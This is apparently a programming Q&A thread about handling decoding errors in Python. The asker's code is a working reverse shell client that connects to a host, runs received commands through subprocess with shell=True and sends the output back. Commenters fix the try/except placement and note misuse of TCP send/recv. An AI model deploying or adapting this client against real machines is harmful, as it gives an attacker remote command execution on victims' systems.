# How to handle error while encryption decoding?

Tags: python, loops, error-handling, utf-8

I am trying to decode packages that will come from the server reverse shell. Problem is It is not always possible to know the encoding style of the reached system even though utf-8 is massively dominating. So I want to loop through a list to try every possible encoding systems that embedded in python to decode the format.

```
import socket
import subprocess
import simplejson
import os
import sys


def decoder():
    codecs = open("C:\\Users\\burak\\Desktop\\Folders\\FILES\\scripts\\scripts_1\\3.9codecs.txt")
    return list(codec.strip()[2:-2] for codec in codecs)


class Client:
    def __init__(self, host, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((host, port))

    def json_send(self, data):
        json_data = simplejson.dumps(data)
        self.connection.send(json_data.encode('utf-8'))

    def json_recv(self):
        json_data = self.connection.recv(2048).decode()
        return simplejson.loads(json_data)

    def command_execution(self, command):
        otpt = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
        parse = otpt.communicate()
        x = 0

>      ***try:
>             This PART !
>         except Exception as e:
>             print(e)***


def change_directory(self, directory):
    os.chdir(directory)
    return "Cd to " + directory


def start(self):
    while True:
        command = self.json_recv()

        if command[0] == "exit":
            self.connection.close()
            sys.exit(0)

        elif command[0] == "cd" and len(command) > 1:
            command_output = self.change_directory(command[1])

        else:
            command_output = self.command_execution(command)

        self.json_send(command_output)


client_one = Client("localhost", 8080)
client_one.start()
```

### In my code you can see, I am extracting a string from a .txt file than converting it into a list, than what I tried is that

```
try:
   for codec in decoder()
      return parse[0].decode(codec)
      if UnicodeDecodeError or TypeError:
         continue
    
except Exception as e:
    print(e)
```

It is not working as I expected, I think everytime decoder crashes, for loop jumping back to where it starts (in my case 'ascii' as a first element of that list). I could not come up with any solutions, ideas ?

Comment: The for-loop needs to be outside of the try; wrapping it.

The whole try body is exited once an error happens. If you want to check the next element in a loop, the try needs to be inside of the loop so that once it exits, the loop can restart where it left off. Also, `if UnicodeDecodeError or TypeError: continue` isn't doing anything meaningful. I think you meant to specify those exceptions in the `except`?

Comment: It worked once I put try inside of for loop thanks. Yes I want to spesify those expceptions

Comment: TCP is a stream. You are using send and recv wrongly. Switch to a well established protocol.

Comment: I know TCP stream but I am converting that stream into packages with json, is it wrong ?